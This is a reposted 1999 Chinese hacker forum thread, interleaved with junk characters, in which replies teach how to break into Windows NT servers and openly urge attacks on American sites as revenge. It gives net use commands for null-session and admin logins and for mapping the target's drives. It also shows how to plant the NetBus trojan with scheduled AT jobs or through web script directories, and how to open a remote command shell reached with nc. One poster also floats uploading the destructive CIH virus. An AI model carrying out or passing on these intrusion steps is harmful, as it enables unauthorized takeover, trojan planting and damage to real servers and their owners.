《版主頁(yè)黑客工具和文章的幾個(gè)問(wèn)題》中提到:/ ^2 m7 X+ [& V. Q) W7 S' v
請(qǐng)教����,從版主頁(yè)上載得PINGER���,GRINDER����,LETMEIN等����,卻不能用,PINGER安裝后��,明明安裝前文件有1M多����,但安裝完后生成的文件夾中只有PINGER。EXE�����,40多K����,運(yùn)行PINGER��,設(shè)置好IP,點(diǎn)PING�����,彈出一個(gè)窗口(C++���。����。�。),說(shuō)出錯(cuò)��,然后關(guān)閉了��,何故�,是不是安裝有誤? 2�。運(yùn)行LETMEIN,彈出以下錯(cuò)誤:連接文件LETMEIN�。EXE到不存在的NETAPI32。DLL���;NETGROUPGETUSERS���。 是否說(shuō)明需要NETAPI32�。DLL文件����,哪里有該DLL。 3�����。USAKILLER 的教學(xué)文章中提到需在WINNT4���。0下運(yùn)行以下步驟等����,是否要求我的操作系統(tǒng)也是WINNT4�����。0 ���,應(yīng)該不是吧�? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT�,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問(wèn)題需高手回答����,我花那么多的時(shí)間和金錢(qián)下載這幾M文件卻不能用�,實(shí)在窩囊哦, 強(qiáng)烈建議USAKILLER 等高手級(jí)的黑客寫(xiě)更多的教學(xué)文章����,以提高我國(guó)黑客水平。
2 W% k& | h+ q/ b7 v> 我的機(jī)子MMX166����,WIN98,2����。5G,32M內(nèi)存��。( X* j# V! U# x. A9 ]
0 J8 m" u: A) j
黑客并不神秘�����,你只要了解操作系統(tǒng),學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn)��,輔助相關(guān)的工具��,就可以成功���。& s( m2 {; J0 a; a
你的問(wèn)題是�����,pinger, grinder, letmein等工具必須要在NT上運(yùn)行�,我們強(qiáng)烈建議����,你一定要安裝NT,對(duì)于你的機(jī)器配制�,和我們現(xiàn)在差不多,只是比你多了32M內(nèi)存�����,2G硬盤(pán)����。
7 T. }( Y1 v Z* Q1 C1 i3 D其實(shí)���,攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了����,比如,我們?cè)贜T上攻擊某服務(wù)器���,該服務(wù)器為NT4.0,我們將做如下簡(jiǎn)單事情就有可能成功���,假設(shè)目標(biāo)NT的IP地址為111.111.111.111�,做法如下:$ i' }3 m$ u4 O/ \7 |# P
net use \\111.111.111.111\ipc$ "" /user:""
& k7 r4 d0 b' Y1 f( Lnet.exe是NT的工具文件���,該命令將和目標(biāo)服務(wù)器建立Null Session�����,如果成功���,你可以查看該服務(wù)器上的共享目錄:- W$ Y1 j' X; V) w/ z8 B e; t4 D
net view \\111.111.111.111
: V o7 W: |* _當(dāng)然,如果你有該NT管理員密碼,就更好辦了��,假設(shè)其管理員Admin密碼為fuck:, }9 w2 s4 m# U- O) Q' T
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"" P6 M/ X }. V/ F2 m1 A0 Q( l; u: T, b
命令成功后��,幾乎所有目標(biāo)NT上的配制�����,資源�,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來(lái)查看或修改:2 x+ I$ w" ~6 {
1、查看或修改遠(yuǎn)程機(jī)器上的硬盤(pán)�����,假如目標(biāo)NT上有C��、D兩個(gè)硬盤(pán):: l% [6 @* x- }
net use x: \\111.111.111.111\c$% Q; L1 O t9 q4 M8 L
net use y: \\111.111.111.111\d$
9 S K; t3 Y* e+ ^6 c$ |這樣����,目標(biāo)NT上的C、D盤(pán)分別被影射為你本地的X�����、Y盤(pán)����,你想怎么做都可以...4 w$ E% U( S; R% _) J& F1 R1 A3 b
2�����、管理目標(biāo)NT的用戶:
) k* o. Z4 d# j& ^/ ]; I從“開(kāi)始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
. [0 M8 t; O+ r( [) D鍵入\\111.111.111.111后��,目標(biāo)NT上的所有用戶你想怎么做都可以�,和管理你本地的一樣9 t8 I, E, X; K# F$ H
3���、管理目標(biāo)NT的服務(wù)
' M9 s3 {; ~& f# D6 k4 f) Y選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”
+ E5 r, c: P F0 {! A7 R) p) u# |這樣你可以管理目標(biāo)NT上的服務(wù)��,共享目錄
1 \! y, z- |8 c: X1 W' N7 j! J4�����、IIS管理( D$ d- G8 _3 d& ?8 l
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
! X& A# d0 o/ Q+ `4 {目標(biāo)NT的FTP、WWW服務(wù)你就可以重新配置
3 [, q: |0 l9 J4 m. S. e; _5��、事件管理9 s; \2 m3 b' B& W5 t
“事件查看器”->連接到服務(wù)器->111.111.111.111+ ` I% e5 z7 T! E
4 B& P' O. K5 l還有更多的東西�����,都可以用NT本身的功能來(lái)完成�����,這些都是95, 98所不能實(shí)現(xiàn)的。7 N; _3 \# P: ^0 \( ~6 g
$ O* k0 j4 W7 v: d4 Y: R6 M' ~. e5 h
當(dāng)然���,98,95也能做一些事情���,但很麻煩,比如:
" j# @' `* |) }6 t& H: k9 Z% ~/ u% [* Lnet use \\111.111.111.111\ipc$
, e" x: {% `* ~& `7 l6 wnet use z: \\111.111.111.111\d$# v5 I5 U# g( F0 w7 L3 n
但其后不能帶參數(shù)����,即改用其他用戶或密碼,系統(tǒng)將用當(dāng)前用戶和密碼去登錄��,如果你知道目標(biāo)NT的用戶或密碼�,重新啟動(dòng)95, 98,改用該用戶和密碼登錄���,方可實(shí)現(xiàn)��,你可以連接目標(biāo)NT上的共享資源����,但不能進(jìn)行管理�����,如用戶、事件等
: l' ?$ T V' P, X) A+ k6 V! Q- m1 z+ e. Z9 v e z+ p
我們強(qiáng)烈建議各位有心要為死難者報(bào)仇�,真正的想黑霉國(guó)的站點(diǎn),花點(diǎn)時(shí)間����,裝個(gè)NT吧,NT Workstation也可以�!
6 [, U- c4 y. a! M! j" F( z1 A這樣,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用�����!
* ~2 m1 Y D% H' ?% o+ p0 q
0 j5 @6 [2 ?0 A: V6 @3 `: [
+ v9 N+ Z1 M2 L5 t--------------------------------------------------------------------------------, K; g' ~+ n$ r, u% w- `
4 i; A% m) K: t U$ D& |
>quack于1999-06-12�,23:37:44. z7 u+ R/ C; C" X1 r0 t" k9 X
在大作《幾個(gè)有關(guān)黑的問(wèn)題》中提到:$ I* |0 P, [7 Q" C0 @' o, s3 x" W# N
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒(méi)有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無(wú)此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無(wú)機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無(wú)法登陸?再有,假定我上傳了CIH,對(duì)了,CIH對(duì)NT暫時(shí)無(wú)效,假定上傳其它"有益"美國(guó)NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國(guó)機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國(guó)鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說(shuō)一句,我還真干掉了幾個(gè)美國(guó)人,哈!。
* i% s9 f3 y. u7 X3 F2 J3 H$ J$ q9 i a5 U- v, H# s9 a
killusa于1999-06-13����,03:25:156 |, T- x. W& D$ e
在大作《Re: 幾個(gè)有關(guān)黑的問(wèn)題》中提到:; G* }8 A. a" ^( A) i( j3 D$ R
/ e' q9 e" f4 @ I3 E6 S. }+ c& A
letmein.exe 暫時(shí)沒(méi)有mypwd參數(shù)�,十分抱歉
& h. o. T3 y* _) |* \. Hpinger程序,只是利用ping來(lái)尋找主機(jī)���,每臺(tái)NT服務(wù)器有一個(gè)主IP地址����,但也可以設(shè)置多個(gè)輔助IP地址,比如有些服務(wù)器供應(yīng)商��,一臺(tái)NT服務(wù)器上可以設(shè)置一千多個(gè)IP����,每個(gè)IP對(duì)應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址,就是該主機(jī)的主IP地址����,所以有時(shí)顯示只有IP,而無(wú)主機(jī)名��。另外���,有些服務(wù)器是非NT的操作系統(tǒng)��,有時(shí)將不會(huì)顯示主機(jī)名����。當(dāng)然�����,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置,也會(huì)出現(xiàn)上面的情況���。
1 x5 u) A3 ~3 k1 R" o! H4 y1 }8 l3 K: w3 L! P. t
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序�����,所以�,netbus.exe是不用上傳的�,只需在目的
( I" d X1 z% D6 c$ X( U0 R+ K' Y服務(wù)器上運(yùn)行ntsrv.exe,而在目的服務(wù)器運(yùn)行該程序有很多種方法:
) @' i2 x- n* ~
3 a2 |$ a) p* U1��、利用服務(wù)器的 Schedule 服務(wù)來(lái)啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序�,具體使用方法,可在自己的NT Dos窗口下鍵入以下:
/ T5 A C2 e& y$ a0 g: V9 w7 N! e4 H& F
C:\>net start schedule
: r. \, ^/ y; E: L: a0 {3 Z0 ySchedule 正在啟動(dòng)服務(wù).....+ g- a* b* w5 U: D. w5 i8 K
Schedulw 服務(wù)啟動(dòng)成功���。+ ^" _) T1 j- q& Q- t, R6 ?
C:\>at /?3 y9 b: D5 r" a" A3 |( [4 V
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序�����。0 r- a7 ~; k2 C7 ~$ o0 |, ?" h
運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)�。
2 D& w4 _( m, m' c) l. Z! Q. E- D1 V- T+ L! f) |5 L0 p
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]8 k8 }. u4 ` m7 r
AT [\\computername] time [/INTERACTIVE]% {: f' D7 O. q
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"0 ]0 c4 o4 w) l( h: E2 }, z% V
$ Z" p5 ^5 w2 ]9 ^5 \\\computername 指定遠(yuǎn)程計(jì)算機(jī)�����。 如果省略這個(gè)參數(shù)
% p F8 v0 b7 A% q0 o4 X( B命令會(huì)被排定在本機(jī)上運(yùn)行��。
! p. m9 M! x* n# b$ Z7 Y+ Qid 指定給排定進(jìn)度命令的識(shí)別號(hào)�。
" D# g: p' Y4 e: h R. s; d) M( {
& d3 F) b! a* Y1 m" F& c8 h! g) {/delete 刪除某個(gè)已排定進(jìn)度的命令。如果省略標(biāo)識(shí)���,計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除�����。
2 J8 t) t q$ r/ j# Q/yes 用于刪除所有作業(yè)�,且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 ����。
- e' ~( R% x6 [4 H% C: i8 vtime 指定命令運(yùn)行的時(shí)間。+ |! O+ j& A1 H) X1 X; c
/interactive 允許作業(yè)在運(yùn)行時(shí)�����,與用戶通過(guò)桌面交互�。
) h4 q" y N0 r8 o$ n% O' T' t& w0 G
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令。
# R. Y: c' o* m& d8 X* X& q5 v2 W& t如果省略日期�����,則默認(rèn)為在每月的本日運(yùn)行。
: D# w9 v" Z# R" e; u$ F1 `
+ y$ ^& ]* N8 S8 L/next:date[,...] 指定在下一個(gè)指定日期 (如�����,下周三)�,運(yùn)行命令。如果省略日期����,則默認(rèn)為在每月的本日運(yùn)行。/ y9 ~( b" }! W" O5 f
7 E) M' ?6 R2 [2 J5 B"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件����。3 a9 Q; k/ m% h) i1 B2 O
8 l/ V$ B& l1 O3 @C:\>
! w3 ]) Z5 c& u6 P# G" X6 E# f. c+ E
& u" I4 I5 }0 {4 F知道了如何使用AT,再來(lái)看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:' c& ~4 K5 F" T% L, D4 L# @
1 利用管理員登陸到目的服務(wù)器�����,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
% T! E0 [2 F5 P- Y& C2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start+ f9 ^* K- F+ L! T1 {5 g
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行�,當(dāng)然最快運(yùn)行最理想,所以��,你可以用letmein.exe得到服務(wù)器的時(shí)間���,然后:$ l. s% ]: r/ u. x6 B |
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
, i% y$ s% t9 Z6 w7 J6 |其中00:00要改為用letmein.exe得回來(lái)的具體時(shí)間+一點(diǎn)容量��,等一會(huì)后�����,再在本地啟動(dòng)netbus.exe�,鍵入目的服務(wù)器得ip地址或hostname����,連接!具體使用可參照 "How to get in nt"�����,比如第一種方法���,你想要在目的服務(wù)器運(yùn)行 LEGION���,可以利用netbus得上傳功能,將LEGION上傳至目的服務(wù)器�,再用netbus的"Start program",鍵入完整路徑的LEGION運(yùn)行程序�����,就ok了!第二種方法是利用netbus的“App redirect”功能����,啟動(dòng)遠(yuǎn)程telnet服務(wù),如下:在netbus中擊“App redirect”�����,鍵入"C:\>winnt\system32\cmd.exe"���,Port為:4321��,服務(wù)就啟動(dòng)了��,然后在本地運(yùn)行:nc x.x.x.x 4321���,出現(xiàn)dos啟動(dòng)的畫(huà)面就表示連接成功:
U7 J2 f. H6 i! [! c- q& PMicrosoft(R) Windows NT(TM): I3 q) }3 T( w. F
(C) Copyright 1985-1996 Microsoft Corp.% s) Y' b2 N. b# l
C:\> x( J6 z, |* ^1 c3 m- u" a
1 w8 t+ E4 `3 N2 J3 ^5 G5 m8 E- a2、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器
. _2 L0 R/ ~% `6 W, m4 X
$ @, {7 ]' Y* Q- i: d' ^- \將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄����,如cgi-bin或scripts,然后在瀏覽器鍵入url如:
, Q/ `$ ^0 g: e. rhttp://x.x.x.x/scripts/ntsrv.exe /port:64321- _8 E9 d# M) u- [
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
3 Q; i6 S. X( ?8 u8 j; d該程序就啟動(dòng)了% B9 y8 n7 b# L+ v
+ Y7 B3 M( ?' i6 ~. o$ H8 k O: L
我只提這幾中方法�!. S' f. M. }% {( |' f7 s
要成功���,必須打好基礎(chǔ)工,對(duì)操作系統(tǒng)充分了解!( e/ P& C2 {3 s! ]1 w/ c' o. P
3 ?8 a9 M" D" z, g6 }* p
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡